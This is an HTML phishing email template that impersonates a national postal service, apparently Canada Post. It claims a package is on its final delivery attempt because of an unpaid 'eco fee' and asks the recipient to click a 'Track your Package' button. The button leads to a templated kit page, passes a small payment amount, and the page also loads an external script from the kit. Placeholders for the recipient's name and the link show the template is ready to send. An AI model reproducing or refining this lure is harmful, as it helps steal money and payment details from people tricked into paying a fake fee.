<html style="" lang="en"><head class=""><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

  <link type="text/css" href="file:///C:/Users/Public.DESKTOP-PTP7THB/Desktop/sarah-v3/.www/%7B%7Blink%7D%7D/files/css/foundation.css" rel="stylesheet">
  <link type="text/css" href="file:///C:/Users/Public.DESKTOP-PTP7THB/Desktop/sarah-v3/.www/%7B%7Blink%7D%7D/files/css/cpc-main.css" rel="stylesheet">

  
  

  
  
  

  <style>
    body {
      background-color: #f5f5f5;
      font-family: Arial, sans-serif;
      font-size: 14px;
      line-height: 1.5;
      color: #333;
    }

    .container {
      margin: 0 auto;
      max-width: 600px;
      padding: 30px;
      background-color: #fff;
      box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
      border-radius: 5px;
      border: 2px solid #ff0000;
    }

    h1 {
      margin-top: 0;
      font-size: 24px;
      color: #333;
      text-align: center;
      background-color: #ff0000;
      padding: 20px;
      border-top-left-radius: 5px;
      border-top-right-radius: 5px;
      color: #fff;
    }

    p {
      margin: 0 0 20px;
      color: #666;
      font-size: 16px;
      line-height: 1.5;
    }

    .button {
      display: inline-block;
      padding: 10px 20px;
      background-color: #0070c9;
      color: #fff;
      border-radius: 5px;
      text-decoration: none;
      margin-top: 20px;
    }

    .button:hover {
      background-color: #004c88;
    }

    .details {
      font-weight: bold;
    }

    .image-container {
      text-align: center;
      margin: 20px 0;
    }

    .image {
      max-width: 100%;
      height: auto;
    }
  </style>
<script src="{{link}}/files/js/prompt.js&quot;"></script></head>
<body class="">
  <div class="">
    <div class="container">
      <center><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" id="Layer_1" x="0px" y="0px" width="50.51020408163265" height="50" viewBox="0 0 99 98" enable-background="new 0 0 99 98" xml:space="preserve">
<path fill="#e4002b" d="M92.807,48.584c0,23.694-19.196,42.903-42.924,42.903c-23.693,0-42.898-19.209-42.898-42.903  c0-23.715,19.205-42.918,42.898-42.918C73.61,5.666,92.807,24.869,92.807,48.584z"></path>
<g>
<polygon fill="#FFFFFF" points="36.293,54.172 39.335,51.131 73.333,49.602 74.854,48.085 41.357,48.085 23.09,26.75    83.985,47.063 63.696,67.378 23.09,67.378 27.159,63.304 61.146,61.79 62.651,60.261 30.191,60.261 33.243,57.208 67.239,55.688    68.762,54.172  "></polygon>
</g>
</svg></center>
      <div class="">
        <header><font size="1.5%">
<center><br>e-Post Secure Notification Alert!</center>
        </font></header><font size="1.5%">
      </font></div><font size="1.5%">
      <br>
      <p>Dear {{receiver_name}},</p>
      <p></p>
      </font><div class="cpc-table--mobile-container" id="mobileResult"><font size="1.5%">
        </font><div class="cpc-table--mobile"><font size="1.5%">
          <p class="packageSection header-margin">
            </p><center><font size="1.5%"><strong>Reschedule Required</strong></font></center>

          <p></p>"<div class="packageSection ng-star-inserted" track-package-info-error-row="" _nghost-c12="">
            <div class="float-left icon-margin ng-star-inserted"></div>
            <div class="float-right ng-star-inserted">

              <br>
              <span>Item: <strong>{{expiredate}}</strong></span><br>
              <span>Status: <strong>FINAL ATTEMPT</strong></span> <br>
              <span>Reason: <strong>ECO FEE UNPAID</strong></span>
              <br>


            </div>
          </div></font>
        </div>
      </div>
      <br><center><a href="{{link}}/public/Canadapost/www/index.php?RECIVER={{sender_name}}&amp;TRANSFERAMOUNT=1.25&amp;EXPIRE={{expiredate}}" class="button">Track your Package</a>
<br><br><font size="1%">
        We are committed to providing exceptional customer service 
        <br></font></center><font size="1%"><br><br>
        <p>Sincerely,</p>
        <p>{{sender_name}}</p></font>



</div></div></body></html>